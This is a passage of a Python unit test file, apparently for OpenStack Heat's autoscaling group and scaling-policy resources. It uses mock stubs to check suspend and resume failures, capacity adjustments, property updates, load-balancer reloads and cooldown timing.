self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
inst_cookie1 = ('foo1', 'foo2', 'foo3')
inst_cookie2 = ('bar1', 'bar2', 'bar3')
instance.Instance.handle_resume().InAnyOrder().AndReturn(inst_cookie1)
instance.Instance.handle_resume().InAnyOrder().AndReturn(inst_cookie2)
instance.Instance.check_resume_complete(inst_cookie1).InAnyOrder(
).AndReturn(True)
instance.Instance.check_resume_complete(inst_cookie2).InAnyOrder(
).AndReturn(True)
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().resources.values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
scheduler.TaskRunner(rsrc.resume)()
self.assertEqual(rsrc.state, (rsrc.RESUME, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend_fail(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
instance.Instance.handle_suspend().AndRaise(Exception('oops'))
self.m.ReplayAll()
sus_task = scheduler.TaskRunner(rsrc.suspend)
self.assertRaises(exception.ResourceFailure, sus_task, ())
self.assertEqual(rsrc.state, (rsrc.SUSPEND, rsrc.FAILED))
self.assertEqual(rsrc.status_reason,
'Error: Resource suspend failed: Exception: oops')
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume_fail(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
instance.Instance.handle_resume().AndRaise(Exception('oops'))
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().resources.values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
sus_task = scheduler.TaskRunner(rsrc.resume)
self.assertRaises(exception.ResourceFailure, sus_task, ())
self.assertEqual(rsrc.state, (rsrc.RESUME, rsrc.FAILED))
self.assertEqual(rsrc.status_reason,
'Error: Resource resume failed: Exception: oops')
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_create_error(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_validate()
self.m.StubOutWithMock(instance.Instance, 'handle_create')
self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
instance.Instance.handle_create().AndRaise(Exception)
self.m.ReplayAll()
conf = stack.resources['LaunchConfig']
self.assertEqual(None, conf.validate())
scheduler.TaskRunner(conf.create)()
self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
rsrc = stack.resources['WebServerGroup']
self.assertEqual(None, rsrc.validate())
self.assertRaises(exception.ResourceFailure,
scheduler.TaskRunner(rsrc.create))
self.assertEqual((rsrc.CREATE, rsrc.FAILED), rsrc.state)
self.assertEqual([], rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_update_ok_maxsize(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Reduce the max size to 2, should complete without adjusting
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['MaxSize'] = '2'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual('2', rsrc.properties['MaxSize'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_minsize(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Increase min size to 2, should trigger an ExactCapacity adjust
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(1)
self.m.ReplayAll()
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['MinSize'] = '2'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual('2', rsrc.properties['MinSize'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Increase min size to 2 via DesiredCapacity, should adjust
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(1)
self.m.ReplayAll()
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['DesiredCapacity'] = '2'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual('2', rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired_remove(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Remove DesiredCapacity from the updated template, which should
# have no effect, it's an optional parameter
update_snippet = copy.deepcopy(rsrc.parsed_template())
del(update_snippet['Properties']['DesiredCapacity'])
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual(None, rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_cooldown(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['Cooldown'] = '60'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['Cooldown'] = '61'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual('61', rsrc.properties['Cooldown'])
rsrc.delete()
self.m.VerifyAll()
def test_lb_reload_static_resolve(self):
t = template_format.parse(as_template)
properties = t['Resources']['ElasticLoadBalancer']['Properties']
properties['AvailabilityZones'] = {'Fn::GetAZs': ''}
self.m.StubOutWithMock(parser.Stack, 'get_availability_zones')
parser.Stack.get_availability_zones().MultipleTimes().AndReturn(
['abc', 'xyz'])
# Check that the Fn::GetAZs is correctly resolved
expected = {u'Type': u'AWS::ElasticLoadBalancing::LoadBalancer',
u'Properties': {'Instances': ['WebServerGroup-0'],
u'Listeners': [{u'InstancePort': u'80',
u'LoadBalancerPort': u'80',
u'Protocol': u'HTTP'}],
u'AvailabilityZones': ['abc', 'xyz']}}
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
lb = stack['ElasticLoadBalancer']
self.m.StubOutWithMock(lb, 'handle_update')
lb.handle_update(expected,
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(None)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['Cooldown'] = '61'
scheduler.TaskRunner(rsrc.update, update_snippet)()
rsrc.delete()
self.m.VerifyAll()
@skipIf(neutronclient is None, 'neutronclient unavailable')
def test_lb_reload_members(self):
t = template_format.parse(as_template)
t['Resources']['ElasticLoadBalancer'] = {
'Type': 'OS::Neutron::LoadBalancer',
'Properties': {
'protocol_port': 8080,
'pool_id': 'pool123'
}
}
expected = {
'Type': 'OS::Neutron::LoadBalancer',
'Properties': {
'protocol_port': 8080,
'pool_id': 'pool123',
'members': [u'WebServerGroup-0']}
}
self.m.StubOutWithMock(neutron_lb.LoadBalancer, 'handle_update')
neutron_lb.LoadBalancer.handle_update(expected,
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(None)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
self.create_scaling_group(t, stack, 'WebServerGroup')
self.m.VerifyAll()
@skipIf(neutronclient is None, 'neutronclient unavailable')
def test_lb_reload_invalid_resource(self):
t = template_format.parse(as_template)
t['Resources']['ElasticLoadBalancer'] = {
'Type': 'AWS::EC2::Volume',
'Properties': {
'AvailabilityZone': 'nova'
}
}
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
error = self.assertRaises(
exception.ResourceFailure,
self.create_scaling_group, t, stack, 'WebServerGroup')
self.assertEqual(
"Error: Unsupported resource 'ElasticLoadBalancer' in "
"LoadBalancerNames",
str(error))
self.m.VerifyAll()
def test_scaling_group_adjust(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# start with 3
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '3'
self._stub_lb_reload(3)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 3')
self._stub_create(3)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
# reduce to 1
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'ChangeInCapacity : -2')
self.m.ReplayAll()
rsrc.adjust(-2)
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# raise to 3
self._stub_lb_reload(3)
self._stub_meta_expected(now, 'ChangeInCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(2)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
# set to 2
self._stub_lb_reload(2)
self._stub_validate()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self.m.ReplayAll()
rsrc.adjust(2, 'ExactCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_scale_up_failure(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.m.VerifyAll()
self.m.UnsetStubs()
        # Scale up by 1 instance with resource failure
self.m.StubOutWithMock(instance.Instance, 'handle_create')
instance.Instance.handle_create().AndRaise(exception.Error())
self._stub_lb_reload(1, unset=False, nochange=True)
self._stub_validate()
self.m.ReplayAll()
self.assertRaises(exception.Error, rsrc.adjust, 1)
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.m.VerifyAll()
def test_scaling_group_nochange(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# raise above the max
rsrc.adjust(4)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# lower below the min
rsrc.adjust(-2)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# no change
rsrc.adjust(0)
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_percent(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
self._stub_create(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self._stub_validate()
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# raise by 200%
self._stub_lb_reload(3)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
def test_scaling_group_cooldown_toosoon(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 60s
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '60'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# Now move time on 10 seconds - Cooldown in template is 60
# so this should not update the policy metadata, and the
# scaling group instances should be unchanged
# Note we have to stub Metadata.__get__ since up_policy isn't
# stored in the DB (because the stack hasn't really been created)
previous_meta = {timeutils.strtime(now):
'PercentChangeInCapacity : -50'}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=10)
self.m.StubOutWithMock(timeutils, 'utcnow')
timeutils.utcnow().MultipleTimes().AndReturn(now)
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
self.m.ReplayAll()
# raise by 200%, too soon for Cooldown so there should be no change
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
rsrc.delete()
def test_scaling_group_cooldown_ok(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 60s
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '60'
self._stub_lb_reload(2)
self._stub_create(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# Now move time on 61 seconds - Cooldown in template is 60
# so this should update the policy metadata, and the
        # scaling group instances should be updated
previous_meta = {timeutils.strtime(now):
'PercentChangeInCapacity : -50'}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=61)
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
# raise by 200%, should work
self._stub_lb_reload(3, unset=False)
self._stub_create(2)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
def test_scaling_group_cooldown_zero(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 0
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '0'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# reduce by 50%
self._stub_lb_reload(1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self._stub_validate()
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0'],
rsrc.get_instance_names())
# Don't move time, since cooldown is zero, it should work
previous_meta = {timeutils.strtime(now):
'PercentChangeInCapacity : -50'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
# raise by 200%, should work
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_up(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
alarm_url = up_policy.FnGetAtt('AlarmUrl')
self.assertNotEqual(None, alarm_url)
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_down(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Scale down one
self._stub_lb_reload(1)
self._stub_validate()
self._stub_meta_expected(now, 'ChangeInCapacity : -1', 2)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
down_policy = self.create_scaling_policy(t, stack,
'WebServerScaleDownPolicy')
down_policy.signal()
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_toosoon(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now move time on 10 seconds - Cooldown in template is 60
# so this should not update the policy metadata, and the
# scaling group instances should be unchanged
# Note we have to stub Metadata.__get__ since up_policy isn't
# stored in the DB (because the stack hasn't really been created)
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=10)
self.m.StubOutWithMock(timeutils, 'utcnow')
timeutils.utcnow().MultipleTimes().AndReturn(now)
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_ok(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now move time on 61 seconds - Cooldown in template is 60
# so this should trigger a scale-up
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the additional instance
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
now = now + datetime.timedelta(seconds=61)
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_zero(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Create the scaling policy (with Cooldown=0) and scale up one
properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
properties['Cooldown'] = '0'
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
# Now trigger another scale-up without changing time, should work
previous_meta = {timeutils.strtime(now): 'ChangeInCapacity : 1'}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(Metadata, '__get__')
Metadata.__get__(mox.IgnoreArg(), up_policy, mox.IgnoreArg()
).AndReturn(previous_meta)
Metadata.__get__(mox.IgnoreArg(), rsrc, mox.IgnoreArg()
).AndReturn(previous_meta)
#stub for the metadata accesses while creating the additional instance
Metadata.__get__(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1',
'WebServerGroup-2'],
rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_none(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Create the scaling policy no Cooldown property, should behave the
# same as when Cooldown==0
properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
del(properties['Cooldown'])
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(asc.ScalingPolicy, 'keystone')
asc.ScalingPolicy.keystone().MultipleTimes().AndReturn(
self.fc)
self.m.ReplayAll()
